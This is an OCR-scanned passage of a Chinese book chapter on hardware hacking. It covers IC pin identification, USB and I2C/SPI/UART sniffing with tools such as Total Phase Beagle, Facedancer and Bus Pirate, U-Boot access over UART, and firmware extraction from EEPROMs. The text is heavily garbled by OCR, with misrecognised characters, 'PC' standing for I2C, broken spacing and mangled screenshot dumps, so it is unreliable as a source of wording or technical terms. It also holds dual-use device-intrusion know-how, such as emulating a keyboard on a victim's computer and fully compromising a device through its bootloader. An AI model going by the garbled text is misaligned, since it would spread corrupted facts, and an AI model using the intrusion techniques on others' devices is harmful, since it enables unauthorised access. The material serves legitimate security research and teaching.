所 销售 产品 的 数据 手册 。 


13.2.1 获得 规格 说 明 书 


对 组 件 的 一 般 性 描述 可 以 用 于 快速 判断 它们 在 PCB 板 上 的 用 途 ， 但 有 时 候 还 需要 更 多 的 信 
息 ， 比 如 一 些 重要 引 脚 的 位 置 。 举 个 例子 , 许多 PCB 板 出 于 调试 的 目的 会 将 IC 的 引 脚 与 一 个 孔 
相连 ， 这 种 孔 叫 作 测试 点 。 

一 般 来 说 ， 测 试点 就 是 PCB 板 上 的 小 孔 ， 工 程 师 可 以 访问 到 与 它 相连 的 线 。 测 试点 或 测试 
焊 点 是 将 连 线 暴露 出 来 的 最 常见 方式 , 不 过 与 板 上 突出 的 引 脚 接头 相 比 还 是 不 大 方便 。 前面 的 例 
子 都 是 通过 这 些 突出 的 接头 来 连接 PCB 上 未 知 的 引 脚 。 硬 件 黑客 Travis Goodspeed 发 明了 一 种 新 
奇 的 引 脚 连接 技术 一 一 使 用 皮下 注射 器 ; 因为 注射 器 由 尖锐 的 导电 金属 ( 针头 ) 和 容易 操作 的 手 
柄 (活塞 部 分 ) 组 成 。 图 13-27 展示 了 这 个 技术 。 
































皮下 注射 器 





测试 点 形态 的 SPI 数 据 引 脚 





图 13-27 Goodspeed 的 针头 技术 
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基于 这 种 技术 ,就 能 精确 地 接触 测试 焊 点 或 测试 点 。 可 以 将 探头 或 者 设备 夹 到 针头 的 金属 部 


分 上 ， 而 不 用 笨拙 地 焊接 测试 点 。 要 知道 ， 这 些 测试 点 要 么 挨 得 太 近 ， 要 么 难以 触及 。 


识别 出 处 理事 或 者 集成 电路 周 

















围 的 测试 点 是 一 个 良好 的 开端 。 接 下 来 追溯 这 些 点 所 连接 的 集 








成 电路 引 脚 时 , 还 需要 了 解 芯片 引 脚 的 用 途 。 找 到 集成 











电路 的 规格 说 明 书 对 于 识别 引 脚 很 有 帮助 。 


在 规格 说 明 书 中 , 一 般 会 有 一 张 基 本 的 忆 片 引 脚 分 布 














图 。 如 采 没 有 这 张 图 ,集成 电路 上 一 般 











也 会 有 标识 四 口 或 者 切 角 ， 用 于 判断 哪 根 引 脚 是 1 号 引 脚 ， 哪 根 是 0 号 引 脚 。 图 13-28 给 出 了 一 
些 不 同 的 例子 。 














切 




















14 13 121011 9 8 
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WAY UP 














PQFP/MQFP 





均 为 俯视 








图 13-28 寻找 1 号 引 脚 


13.2.2 ”难以 识别 的 组 件 


有 些 时 候 , 识别 PCB 板 上 的 某 个 组 件 十 分 困难 。 厂 商 可 能 会 用 环 氧 树脂 覆盖 芯片 ， 或 是 去 
掉 丝 网 印刷 表面 的 文字 。 还 有 极 少 数 时 候 ， 有 的 厂商 ( 尤其 是 CPU 和 微 处 理 器 厂商 ) 会 在 集成 电 
路 上 印 上 “SECRET”( 秘密 ) 或 者 项 目 代号 。 幸 好， 这 样 的 情况 在 消费 类 电子 产品 中 非常 少见 。 

堆 又 式 封装 

一 种 常见 的 混 涌 保护 机 制 是 业界 所 谓 的 堆 芭 式 封装 结构 (Package on Package，PoP )。 制 造 
商 经 常 使 用 这 种 技术 ， 将 多 个 组 件 像 三 明治 一 样 生起 来 ， 以 节省 有 限 的 PCB 空间 。 以 前 ,PCB 
上 的 组 件 紧 挨 在 处 理 器 旁边 ， 用 线 相连 ; 现在 ， 制 造 商会 将 组 件 垂直 地 放 在 CPU 的 上 面 ， 然 后 
打包 出 售 ， 而 设备 广 商 可 以 以 不 同 配置 分 别 购买 。 图 13-29 是 该 结构 的 图 例 。 

根据 我 们 的 经 验 , 最 常见 的 情况 是 用 这 种 方法 将 微 处 理 器 和 内 存 封装 在 一 起 。 有 的 厂商 会 使 
用 PoP 结构 ， 而 不 是 使 一 堆 闪 存 水 平地 分 布 在 CPU 旁边 。 此 时 ， 唯 一 能 看 到 的 是 处 理 器 上 的 闪 
存 序列 号 。 在 网 上 搜 该 序列 号 无 法 得 到 处 理 需 规格 书 。 

这 种 情况 下 的 做 法 取决 于 设备 的 具体 情况 : 有 时 , 可 见 的 组 件 和 底下 隐藏 的 组 件 是 由 同一 个 
制造 商 生 产 的 ; 有 时 ,顶层 组 件 的 规格 书 会 写 清楚 它 支 持 哪些 封装 设备 。 总 之 没有 统一 的 解决 方 
法 , 需要 一 些 调查 工作 才能 确定 下 面 隐藏 设备 的 名 字 。 还 有 时 候 甚至 能 找到 一 些 第 三 方 信息 一 一 
有 些 技术 狂热 爱好 者 会 对 消费 级 设备 进行 拆 解 ， 从 而 获得 各 类 细节 。 
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内 存 SORAM 











图 13-29 ” 堆 释 式 封 装 

















13.3 拦截、 监听 和 劫持 数据 


无 论 对 于 软件 还 是 硬件 , 漏洞 研究 的 一 个 重要 话题 都 是 在 其 正常 运转 的 情况 下 拦截 和 观察 数 
据 。 根 本 目的 是 观察 可 以 干扰 、 算 改 、 嘛 形 构 造 或 重 放 的 数据 ， 以 影响 目标 中 的 某 些 漏 洞 。 硬件 
的 漏洞 研究 亦 是 如 此 。 

事实 上 , 这 类 攻击 一 般 在 租 入 式 系统 上 更 容易 取得 成 效 ， 因为 绝 大 部 分 固件 开发 者 和 般 入 式 
开发 者 认为 硬件 入 口 门槛 非常 高 , 不 会 遇 到 问题 。 因 为 通信 双方 的 软件 都 由 他 们 自己 编写 ， 所 以 
固件 开发 者 和 赎 人 式 开发 者 甚至 不 会 考虑 这 些 数据 可 能 被 畸形 构造 , 从 而 很 少 对 输入 的 值 进行 健 
全 性 检查 。 这 通常 是 出 于 对 安全 的 忽视 ,或 者 仅仅 是 为 了 速度 优化 。 

本 节 简 要 介绍 一 些 工 具 ， 用 于 在 般 入 式 设备 的 通信 和 链 路 中 观察 数据 。 首 先 介 绍 USB 相关 的 
工具 ， 因 为 USB 接口 一 般 对 外 暴露 ; 接 下 来 讨论 监听 暴露 较 少 的 PTC、SPI 和 UART 接口 上 的 
通信 。 
























































13.3.1 USB 


USB 是 最 常见 的 接口 , 在 几乎 所 有 的 移动 设备 和 棕 入 式 设备 上 都 可 以 见 到 。 所 有 Android 设 
备 都 有 一 个 对 外 暴露 的 USB 接口 。 也 许 正 因为 它 随处 可 见 ， 所 以 人 们 很 容易 对 其 产生 不 准确 的 
认识 。 事 实 上 ，USB 协议 相当 复杂 。 简 洁 起 见 ， 本 节 只 介绍 上 层 部 分 协议 。 

想 学 习 和 了 解 USB 协议 ，Jan Axelson 的 《USB 开发 大 全 》 是 一 本 好 书 。 即 使 不 打算 深入 理 
解 整个 协议 ， 这 本 书 介 绍 性 的 前 几 个 章节 也 非常 值得 一 读 。 这 几 章 简明 扼要 地 介绍 了 USB 的 传 
输 模式 、 版 本 和 速度 等 方面 。 由 于 通常 将 USB 作为 一 种 点 对 点 的 通信 方式 使 用 ， 我 们 忽略 了 一 
个 事实 : USB 作为 网 络 具有 使 多 个 设备 和 主机 通过 同一 条 总 线 进行 通信 的 功能 。 

有 了 这 本 书 作为 参考 ， 就 可 以 开始 拆 解 和 分 析 USB 流量 了 。 在 真实 世界 里 ， 应 该 用 什么 工 
具 来 观察 USB 设备 呢 ? 
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1. USB 嗅 控 

在 市 面 上 可 以 买 到 许多 USB 调试 和 协议 分 析 设 备 ， 其 中 Total Phase 公司 的 产品 数一数二 。 
Total Phase 制造 了 许多 线 缆 协议 分 析 仪 ， 包 括 用 于 SPI、CAN 、TC 等 协议 的 设备 ， 后 面 会 谈 到 。 
Total Phase 还 生产 了 许多 不 同 价位 的 USB 协议 分 析 仪 。 所 有 设备 ( 包括 非 USB 分 析 仪 在 内 ) 都 
使 用 了 相同 的 软件 套件 ， 名 为 Total Phase Data Center。 这 些 分 析 仪 的 主要 区 别 在 于 价格 和 分 析 能 
力 ， 而 主要 的 分 析 能 力 差 异 是 能 处 理 的 USB 总 线 速度 。 最 贵 的 设备 可 以 完整 监控 USB 3.0 设备 ， 
中 间 档 可 以 监控 USB 2.0， 最 便宜 的 则 只 能 监控 USB 1.0。 

抽象 地 看 ，USB 规范 将 设备 分 为 USB 主机 (USB host ) 和 USB 设备 (USB device )， 区 别 主 
要 体现 在 USB 控制 器 上 。USB 主机 一 般 较 大 ， 比 如 台式 和 笔记 本 电脑 ; USB 设备 一 般 较 小 ， 比 
如 吕 盘 、 外 接 硬 盘 、 手 机 等 。 主 机 和 设备 的 区 别 在 本 节 后 面 会 变 得 很 重要 。Total Phase 分 析 仪 位 
于 USB 主机 和 USB 设备 之 间 ， 被 动 地 监听 两 者 之 间 的 通信 。 

Total Phase Data Center 软件 通过 USB 线 控制 分 析 仪 ， 其 界面 如 图 13-30 所 示 。 
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图 13-30 ”Total Phase 软件 界面 


该 软件 的 功能 和 著名 的 开源 网 络 监控 工具 Wireshark 一 样 ， 只 不 过 是 用 于 USB 协议 。 通 过 这 
个 软件 ， 可 以 记录 和 查看 协议 会 话 ， 并 以 多 种 方式 对 数据 进行 分 析 。 它 还 暴露 了 一 组 API 接口， 
让 我 们 可 以 直接 与 其 设备 或 软件 进行 交互 ， 执 行 捕 包 、 接 收回 调 或 触发 操作 ， 并 解析 、 操 作 捕 获 
到 的 数据 。 

除了 上 述 功能 ，Data Center 套件 还 包含 许多 其 他 功能 ， 比 如 可 以 在 数据 流 上 添加 注释 ， 对 
USB 协议 术语 提供 在 线 参考 帮助 ， 以 及 对 USB 数据 进行 可 视 化 分 析 等 。 这 个 可 视 化 工具 名 为 
Block View， 可 以 用 来 生成 可 视 化 的 USB 协议 包 分 层 图 ， 如 图 13-31 所 示 。 
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图 13-31 Total Phase 的 Block View 工具 


Total Phase 只 能 被 动 地 监控 USB 总 线 上 的 数据 。 如 果 只 需要 查看 和 分 析 协 议 中 的 数据 ， 这 
个 工具 就 几乎 完成 了 所 有 工作 。 但 是 如 果 想 和 USB 设备 主动 交互 ， 这 个 工具 就 无 能 为 力 了 ， 
为 它 不 能 对 流量 进行 重 放 ， 也 不 能 对 数据 包 进 行 注 入 。 
根据 具体 目标 ， 可 以 选择 不 同 的 方法 实现 交互 : 主动 重 放 或 者 在 USB 协议 底层 与 USB 设 
备 主 动 交互 。 两 者 的 本 质 区 别 在 于 是 和 USB 主机 还 是 USB 设备 交互 。 不 过 无 论 哪 种 情况 ， 都 
有 多 种 方法 。 

2. 作为 USB 主机 与 USB 设备 交互 

从 USB 主机 的 角度 分 析 USB 设备 非常 简单 ,除了 可 以 用 Total Phase 这 类 工具 进行 被 动 监听 ， 
还 可 以 基于 libusb 库 自己 编写 代码 与 设备 交互 。 

libusb 是 一 个 开源 代码 库 , 开发 者 基于 它 可 以 从 USB 主机 的 角度 进行 USB 通信 。libusb 提供 
了 USB 通信 的 协议 封装 ， 这 样 就 不 用 打开 原始 的 USB 设备 ( 比如 通过 /dev 文件 系统 ) 并 进行 最 
底层 的 操作 。Python 和 Ruby 等 流行 语言 还 提供 了 对 libusb 的 封装 ， 并 对 多 个 版 本 的 libusb 提供 
各 个 层次 的 动态 语言 支持 。 

在 互联 网 上 ， 有 许多 基于 PyUSB 或 其 他 高 级 语言 与 USB 设备 进行 通信 的 例子 ， 这 些 目标 设 
备 包 括 Xbox Kinect、 键 盘 和 鼠标 等 HID 设备 。 选 择 libusb 这 个 流行 库 的 好 处 是 ， 许 多 简单 的 问 
题 都 能 通过 搜索 找到 答案 。 

3. 作为 USB 设备 与 USB 主机 交互 

相反 ， 如 果 想 作为 USB 设备 与 USB 主机 交互 ， 情 况 要 复杂 得 多 。 这 是 因为 USB 控制 需 会 
声明 它们 是 主机 还 是 设备 , 而 我 们 无 法 强行 要 求 笔记 本 和 台式 电脑 上 的 USB 控制 器 将 自己 伪装 成 
一 个 USB 设备 。 因 此 , 需要 一 些 中 间 层 硬件 的 帮助 。 许 多 年 来 , 几乎 没有 什么 设备 具有 这 个 功能 。 
直到 几 年 前 , Travis Goodspeed 发 布 了 另 一 个 开源 硬件 , 名 为 Facedancer。 图 13-32 是 Facedancer 2.0 
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版 的 PCB 布局 图 。 这 个 设备 为 其 租 和 人 的 MSP430 处 理 器 使 用 了 特殊 的 固件 ， 使 其 作为 USB 设备 
从 一 个 USB 主机 接受 数据 ， 然 后 以 代理 的 身份 转发 给 另 一 个 USB 主机 。 





图 13-32 Facedancer v2.0 


后 来 ，Ryan M. Speers 发 现 了 Facedancer 2.0 版 中 的 一 些 简 单 电路 错误 。Travis Goodspeed 之 
后 发 布 了 包含 Speers 所 作 修 复 的 Facedancer21， 用 于 代替 有 问题 的 Facedancer20。 

Facedancer 是 完全 开源 的 , 其 代码 仓库 中 还 包含 一 些 通过 USB 直接 与 硬件 交互 的 Python 库 。 
因此 ,开发 者 可 以 使 用 这 些 Python 库 编 写 程序 , 以 USB 设备 的 身份 通过 Facedancer 与 其 他 USB 
主机 交互 。 

Facedancer 的 代码 中 包含 许多 可 以 直接 使 用 的 例子 ， 比 如 伪装 成 一 个 HID 键盘 。 插入 受害 者 
的 计算 机 后 ， 它 会 在 屏幕 上 自动 输入 一 些 消息 ， 看 起 来 就 像 用 户 自己 在 使 用 USB 键盘 一 样 。 男 
一 个 例子 是 模拟 外 接 存储 器 , 它 可 以 将 开发 者 机 器 上 的 任何 一 个 磁盘 镜像 或 者 文件 挂 载 到 受害 者 
的 计算 机 上 ， 使 其 认为 这 是 一 个 U 盘 。 

Facedancer 起 源 于 电子 爱好 者 的 一 个 项 目 。Travis Goodspeed 自己 制作 了 PCB 板 ， 但 是 大 规 
模 组 装 生产 的 开销 很 大 , 需要 自己 购买 所 有 零件 然后 焊接 起 来 。 幸运 的 是 , 本 书 出 版 时 , INT3.CC 
网 站 http:V/int3.cc/ 已 经 开始 销售 完全 组 装 好 的 Facedancer21。 

除 此 之 外 ， 有 一 些 设 备 可 以 像 Facedancer 一 样 用 于 低层 次 USB 开发 。 其 中 一 个 名 为 
SuperMUTT， 诞 生 于 VIALabs 和 微软 的 合作 。 它 用 于 和 微软 USB 测试 工具 ( Microsoft USB Test 
Tool，MUTT; 设备 因此 得 名 ) 协同 工作 ， 可 以 模拟 总 线 上 的 任何 设备 流量 ， 因 此 受到 USB 开发 
者 们 的 喜爱 。 

不 管 选择 哪个 工具 , 现在 不 需要 复杂 的 硬件 工具 或 自己 定制 专门 的 硬件 , 就 可 以 可 编程 地 模 
拟 一 个 USB 设备 了 。 
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13.3.2 1:*C、SPI 和 UART 串 行 端口 


前 面 简单 讨论 了 PC、SPI 和 UART， 也 介绍 了 它们 在 电路 中 的 使 用 。PC 和 SPI 一 般 用 于 电 
路 间 通 信 ， 也 就 是 在 系统 内 部 不 同 集成 电路 和 组 件 之 间 通 信 ; 与 之 不 同 的 是 ，UART 一 般 用 于 向 
用 户 提供 交互 式 接口 或 者 调试 接口 ， 或 者 为 较 大 的 外 设 ( 比如 调制 解 调 器 ) 提供 接口 。 应 该 如 何 
窃听 这 些 总 线 上 的 流量 或 者 注入 数据 呢 ? 

1.1C、SPI 和 UART 嗅 探 

前 面 介绍 如 何 确定 UART 引 脚 分 布 时 , 讲 到 了 怎样 用 逻辑 分 析 仪 来 记录 总 线 上 的 流量 。 类 似 
Saleae 的 工具 中 有 软件 滤波 器 ,可 以 智能 地 猜测 观察 到 的 串 行 端口 协议 是 什么 。 当 时 给 出 了 一 个 
示例 ， 用 UART 分 析 器 在 博通 电缆 调制 解 调 器 的 暴露 引 脚 中 寻找 并 解码 输出 数据 。 

对 PC 和 SPI 串 行 通信 ， 也 可 以 基于 Saleae 用 同样 的 方法 来 分 析 ， 也 有 其 他 一 些 工 具 可 以 专 
门 监测 了 C 和 SPI 接 口 。 

Total Phase 生产 了 一 个 比较 便宜 的 USB 设备 ， 专 门 用 于 监测 并 分 析 PC 和 SPI 数据 ， 名 为 
Beagle PC。 这 个 设备 也 适用 13.3.1 节 介 绍 的 Data Center 软件 。Saleae 逻辑 分 析 仪 只 是 简单 地 观 
察 方 波 并 猜测 协议 类 型 ;与 之 相 比 ，Data Center 显然 更 适合 进行 协议 分 析 。 

13-33 所 示 的 就 是 用 Total Phase 的 Beagle 嗅 探 一 根 VGA 线 的 PFC 引 脚 。 有 具体 来 说 ， 这 里 
截取 的 是 显示 器 和 显卡 之 间 正 在 发 生 的 EDID (扩展 显示 标识 数据 ) 协议 交换 。 此 时 ， 通 过 一 个 
自己 定制 的 视频 接头 来 截获 显示 需 插 人 计算 机 时 的 EDID 数据 ,这样 就 可 以 访问 显示 器 和 计算 机 
之 间 VGA 线 所 有 引 脚 的 数据 了 。 




































































File Edit Analyzer View Help Command Line 


国 底 久 局 | 镶 量 国 | 国 ;xe 和 回国 四 天 回忆 也 好 | ts 

















Index m:s.ms.us Dur Len Emr S/p Addr Record Data a 
0 0:00.000.000 号 Capture started [06/09/11 02-14:02] classify classify [ VIEW ] 
1 0:08.637.140 25.9us 08 SP N... A Corrupt Transact... language language [LANGUAGE | de 
2 0:08.637.178 238us 18 sp 50 SS Write Transaction 00 lens lens [PROTOCOL | show] 
3 0:08.638.254 259us 0oB SP N. a Eric TD Mei 
4 0:08.638.292 1.15ms 1B Ss 50 BS Write Transaction 00 
5 0:08.639.445 18.8ms 128B SP 50 EReadTransaction 00 FF FF FF FF FF FF .| |lens -- lens [PROTOCOL | show] 
DESCRIPTION 
Configure the graphical user interface 
This modifies which captures are Viewal 
specified protocol. 
PROTOCOL - The protocol to set the len: 
= The protocol may be one of the fol1 
EE re 国 目 回回 回回 国 国 nt 


No filter: 6 records, Protocoltens: IC 7 "| show - Displays the current protocol 1 

















中 要 | 

0D 14 01 03 OF 35 1E 78 EE EE 91 A3 54 4C 99 26 -+----5-x----TL-E Set's the graphical user interface 站 
OF 50 54 AS5 4B 00 71 4F 81 80 D1 C0 01 01 01 01 -PT-K-q0------ 

ol 01 01 ol ol ol 02 3A 80 18 71 38 2D 40 58 2C ------- :--q8-@x, 8> lens i2c 


Lens has been set to i2c. 
9> run 
Capture started. 


45 00 13 2B 21 00 00 1E 00 00 00 FF 00 58 31 37 下 -+ X17 
35 52 30 33 4F 32 43 48 55 0A 00 00 00 FC 00 44 SR0O302CHU----…- D 
45 4C 4C 20 53 54 32 34 31 30 0A 20 00 00 00 FD ELL ST2410- -- 
00 32 4C 1E 53 11 00 0A 20 20 20 20 20 20 00 FI -2L-S--- Bi 


| Tming | Bus | UveFiter | in 


SN: 1095-676367 HW: 1.00 FW: 4.01 I2C 100ns 0.000Kbps EN 




































































图 13-33 用 Total Phase 的 Beagle 分 析 VGA 线 


和 UART 一 样 ,SPI 和 PC 能 以 不 同 的 速率 运行 ,因此 需要 在 正确 的 波 特 率 上 尝试 解码 .Saleae [号 | 
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和 Total Phase 都 可 以 基于 时 钟 引 肢 相当 准确 地 猜 出 波 特 率 。 不 过 还 有 一 些 细 微 的 差别 需要 注意 。 

与 UART 不 同 ,， ?PC 用 于 在 PCB 上 的 多 个 组 件 之 间 建 立 通信 网络 。 与 JTAG 类 似 ， 每 个 PC 
设备 都 将 自己 声明 为 主 设备 或 者 从 设备 ,每 当 一 个 设备 连接 到 了 C 总 线 并 激活 , 都 会 改变 整个 了 C 
环 路 的 电压 值 ， 因 为 它 会 消耗 部 分 电压 ， 从 而 导致 整 条 线路 的 电压 下 降 。 当 FC 链 上 的 设备 处 于 
非 激活 状态 时 ， 看 起 来 像 是 断 开 了 与 电路 的 连接 。 为 了 保持 TC 线路 上 的 电压 ，FC 规范 要 求 在 
时 钟 引 脚 和 数据 引 脚 之 间 设 置 一 个 上 拉 电 阻 ,以 保持 电压 。 即 便 链 上 的 一 个 组 件 处 于 非 激活 状态 
时 也 是 如 此 。 正 如 其 名 ,“ 上 拉 ” 电 阻 负责 将 电压 拉 升 到 期 待 的 值 。 

可 想 而 知 , 将 探头 或 者 像 Beagle 这 样 的 分 析 设 备 连 接 到 FC 总 线 上 , 也 会 改变 这 条 线路 的 电 
压 。 因 此 , 将 分 析 工 具 连 接 到 线路 上 后 ， 同 样 需要 一 个 上 拉 电 阻 将 电压 提升 到 正确 的 水 平 。 好 消 
息 是 ， 许 多 PC 分 析 工 具 考虑 到 了 这 一 点 ， 内 部 已 经 包含 了 上 拉 电 阻 ， 并 且 可 以 通过 软件 的 开关 
启用 或 者 禁用 它 。Beagle 分 析 工 具 以 及 下 面 将 要 介绍 的 Bus Pirate 都 有 这 个 功能 。 

2. 与 AKC、SPI 和 UART 设备 交互 

另 一 方面 , 如 何 与 FTC、SPI 和 UART 设备 进行 交互 呢 ? 成 本 最 低 的 方法 是 用 图 13-34 所 示 的 
Bus Pirate 设备 。 
































图 13-34 Bus Pirate v3 








Bus Pirate 是 一 个 起 源 于 Hack-A-Day 网 站 ( http://hackaday.com/ ) 的 业余 爱好 项 目 , 但 是 很 
快 就 在 业余 爱好 者 社区 之 外 广泛 流行 起 来 。 它 非常 便宜 , 在 许多 零售 商 那 里 都 可 以 花 30 美元 左 
右 买 到 。 

与 前 面 提 到 的 JTAGulator 类 似 ，Bus Pirate 也 是 一 个 USB 设备 ， 并 且 有 不 错 的 CLI 界 面 。 可 
以 在 电脑 上 通过 USB 线 使 用 任何 终端 模拟 程序 ( 比如 PuTTY 、Minicom 或 者 GNU Scree ) 访问 
它 。 下 面 是 使 用 其 ?命令 得 到 的 帮助 信息 摘录 : 
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[s7ephen@xip ~]$ ls /dev/*serial* 





/dev/cu.usbserial-Al10139BG /dev/tty.usbserial-Al10139BG 
[s7ephen@xip ~]$ screen /dev/ tty.usbserial-A10139BG 115200HiZ> 

HS 

General Protocol interaction 

? This help (0) List current macros 

=X/|X Converts X/reverse 又 (x) Macro x 

~ Selftest [ Start 

# Reset ] Stop 

S Jump to bootloader { Start with read 

区 /各 Delay 1 us/ms } Stop 

a/A/@ AUXPIN (low/HI/READ) abc Sengd string 

b Set baudrate 汪 忆 汉 

ee AUX assignment (aux/CS) 0x123 

d/D Measure ADC (once/CONT.) 0b110 Send value 

f Measure frequency ha Read 

g/S Generate PWM/Servo CLK hi 

nh Commandhistory N CLK lo 

i Versioninfo/statusinfo A CLK tick 

1/L Bitorder (msb/LSB) 一 DAT hi 

m Change mode DAT lo 

oO Set output type a DAT read 

p/P Pullup resistors (off/ON) ! Bit read 

S Script engine Repeat e.g. r:10 

V Show volts/states E Bits to read/write e.g. 0x55.2 

w/W PSU (off/ON) A Usermacro x/assign x/list all 

HFS 


如 图 13-35 所 示 ， 可 以 用 一 套 能 直接 插入 Bus Pirate 的 探头 将 其 与 SPI、I?C 或 者 UART 总 





图 13-35 Bus Pirate 的 探头 
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JTAGulator 会 猜测 引 脚 分布 ， 但 是 Bus Pirate 不 同 ， 需 要 根据 调试 目标 来 具体 配置 其 探头 。 
在 网 上 可 以 轻松 地 找到 用 颜色 编码 的 Bus Pirate 探头 备 忘 表 ， 然 后 将 其 与 SPI、FC 和 UART 接口 
相连 。 还 需要 告诉 Bus Pirate 关于 这 些 接口 的 一 些 细节 信息 ， 比 如 之 前 用 Saleae 等 工具 猜测 出 的 
波 特 率 ( 如 图 13-36 所 示 )。 


COMID- PUTTY eale@-|E| 
























































图 13-36 ”在 Bus Pirate 中 设置 波 特 率 


























连接 好 以 后 ， 就 可 以 通过 Bus Pirate 与 目标 总 线 交 互 式 或 者 被 动 地 通信 了 。Bus Pirate 的 界面 
是 基于 文本 的 ， 不 能 直接 查看 这 些 总 线 上 传输 的 二 进 制 数据 。 对 这 些 二 进 制 数据 ，Bus Pirate 显 
示 每 个 字 节 的 值 (比如 0x90 )。 如 果 要 和 二 进 制 数据 流 打交道 ， 这 肯定 不 是 最 好 的 方式 。 因 此 ， 
许多 人 基于 PySerial 这 样 的 库 编 写 软件 来 控制 Bus Pirate， 接 收 其 ASCII 数据 流 ， 然 后 只 将 自己 
感 兴趣 的 字 节 转换 成 直接 的 字符 表示 。 

为 了 解决 这 个 问题 ，Travis Goodspeed 开发 了 GoodFET。 这 是 一 个 由 Python API 控制 的 Bus 
Pirate。 与 Facedancer21 不 同 的 是 ,在 许多 零售 商 那 里 都 能 买 到 它 。 通 过 GoodFET 就 能 以 编程 的 
方式 与 总 线 交 互 ， 接 收 或 者 发 送 超出 ASCII 可 显 字符 范围 的 二 进 制 数据 。 

Bootloader 

与 设备 建立 可 交互 的 连接 以 后 ， 重 启 设备 就 会 看 到 来 自 bootloader 的 信息 。 设 备 启动 后 ， 许 
多 bootloader ( 比如 Das U-Boot， 简 称 U-Boot ) 会 设置 一 个 短暂 的 时 间 窗 口 。 此 时 按 下 任意 键 ， 
就 可 以 进入 交互 式 bootloader 菜单 。 图 13-37 就 是 U-Boot 弹出 提示 时 的 截屏 。 

这 种 情况 下 ， 就 已 经 可 以 完全 攻破 设备 了 ， 但 是 bootloader 经 常会 提供 下 列 不 必要 的 额外 





















































































































































口 读 写 闪存 
口 从 网 络 引 导 
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口 从 串 行 端口 升级 或 者 接受 新 的 固件 
口 对 闪存 中 的 文件 系统 进行 分 区 或 其 他 操作 

















可 COMI0 -PuTTY [Eee 














图 13-37 ”U-Boot 引导 信息 
图 13-38 展示 了 标准 U-Boot 提供 的 完整 指 今 。 


© Terminal — vim — 91x40 


























图 13-38 ”U-Boot UART 会 话 
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不 少 设备 上 既 有 可 以 访问 的 UART， 又 使 用 了 U-Boot 作为 bootloader， 此 时 就 可 以 获得 类 似 
的 会 话 。 事 实 上 ， 如 果 厂 商 不 想 禁 用 UART， 就 通常 会 暴露 出 U-Boot。 
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我 们 已 经 介 





站 绍 了 如 何 观 察 组 件 之 间 以 及 设备 之 间 通 信 的 数据 , 也 介绍 了 如 何 与 这 些 通信 渠道 





互动 。 基 于 这 些 技术 ,就 可 以 开展 模糊 测试 并 观察 异常 或 衣 演 了 。 不 过 , 你 可 能 并 不 想 进 行 模糊 
测试 ， 只 是 希望 将 二 进 制 镜像 导入 到 IDA 这 样 的 工具 中 ， 对 其 逆向 并 寻找 其 中 的 漏洞 。 








如 何 访 问 这 些 伐 人 的 数据 呢 ? 


13.4.1 无 损 地 获得 固件 


有 时 可 以 找到 简单 且 无 损 的 方法 从 设备 中 提取 出 固件 镜像 。 第 一 种 方法 取决 于 设备 使 用 的 是 
情况 下 , 固件 镜像 并 没有 存储 在 NAND 或 者 其 他 类 型 的 闪存 中 , 而 是 (出 





哪 种 存储 器 。 在 极 少 交 
于 备份 的 目的 ) 存储 在 了 EEPROM 里 。 
1. SPI EEPROM 


前 面 提 到 了 许多 使 用 SPI 的 设备 ， 比 如 加 速 器 和 温度 传感器 。SPI EEPROM 也 使 用 SPI， 
型 的 存储 器 一 样 通过 特制 的 接口 和 “地 址 线 ” 











通过 一 条 简单 的 串 行 线 读 写 数据 ， 而 不 是 像 其 他 类 


























站 


已 








来 读 写 。 这 种 存储 设备 的 工作 方式 非常 简单 : 向 SPI 或 下 C 总 线 写 人 一 个 地 址 ( 比如 0x90 )， 然 
后 EEPROM 设备 就 会 返回 这 个 位 置 存储 的 数据 。 图 13-39 就 是 用 Total Phase 的 Beagle 查看 一 个 











设备 从 PC EEPROM 读 写 数据 时 的 截屏 。 





































































































































@ Untitied - Total Phase Data Center a 
File ”Edt Analyzer View Help Command Line 
| fm 280.91B 洒 下 和 8> lens i2c 
EE A 9 | 回国 加 日 | 2 
Index ms.ms.us Dur len Er SP Addr Record Data ^||9> rn 
34 0:01.413.376 247us 1B SP 50 多 Read Transaction 6D* 国 2 
35 0:01.414.041 363us 28B SP 50 SS Write Transaction 00 11 Ci CT OT i i 铀 
36 0:01414417 247 us 18 SP 50 铭 ReadTransaction 20* 11> stop 
37 0:01.415.082 357 us 2B SP 50 SN Write Transaction 00 12 Capture stopped. 
38 0:01.415.452 247 us 18 SP 50 克 ReadTransaction 74* 12> clear 
39 0:01416.122 357Us 28 SP 50 SN Write Transaction 00 13 人 rc 
40 001416.493 247us 1B SP 50 登 ReadTransacion 68* ne 
S Buffer cleared. 
41 0:01.417.158 357 us 2B SP 50 S Write Transaction 00 14 
42 0:01.417.528 247 Us 1B SP 50 铭 ReadTransaction 65* Capture started. 
43 0:01.418.203 ”357 us 28 SP 50 SS Write Transaction 00 15 15> stop 
44 0:01.418.573 247 us 18 SP 50 你 ReadTransaction 20* Capture stopped. 
45 0:01.419.243 357us 2B SP 50 SS Write Transaction 00 16 0 ae 
不 加 i ew EE Unsaved data discarded. 
17> clear(True) 
Text 下 所 Livesearch 回回 Buffer cleared. 
No filter: 1683 records. 和 
Capture started. 
Detais 19> stop 
Offset BE EE A Capture stopped. 
Ox0000 68 hn os pip | 
Unsaved data discarded. 
21> clear(True) 
Buffer cleared. 
22> run 
下 a Fm Che eeprom Capture started. 
this data from the eeprom 
this data from the eeprom 
this data from the eeprom 
Timing this data from the eeprom 口 | 
a SN: 1095-676367 HW: 100 FW: 4.01 I2C i00ns 0.000Kbps EN 




















图 13-39 Total Phase Beagle 分 析 PC EEPROM 
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在 这 个 窗口 顶端 的 数据 传输 视图 中 可 以 清楚 地 看 到 ， 每 一 个 Write Transaction 后 面 都 
跟着 一 个 Read _ Transaction。CPU 向 PC 总 线 写 人 了 地 址 0x0013, IC EEPROM 则 返回 了 那 
个 位 置 的 值 0x68。 通 过 这 种 方式 可 以 直接 读 取 这 类 EEPROM 里 存储 的 内 容 。 想 在 设备 中 识别 出 
这 类 EEPROM， 只 需要 在 网 上 搜索 它们 的 序列 号 即 可 。 

除了 观察 CPU 如 何 使 用 这 类 EEPROM，Total Phase Data Center 还 提供 了 直接 从 SPI 或 PC 
EEPROM 中 自动 读 出 数据 的 功能 。 使 用 这 一 功能 可 以 在 计算 机 上 将 二 进 制 数 据 重 组 成 一 个 文件 。 
用 Bus Pirate 或 者 GoodFET 也 可 以 达到 同样 的 效果 。 

2. 存储 固件 镜像 的 MicroSD 和 SD 卡 

有 些 设备 会 用 MicroSD 卡 或 者 SD 卡 来 升级 固件 , 或 者 将 固件 镜像 文件 存储 在 这 些 卡 上 。 如 
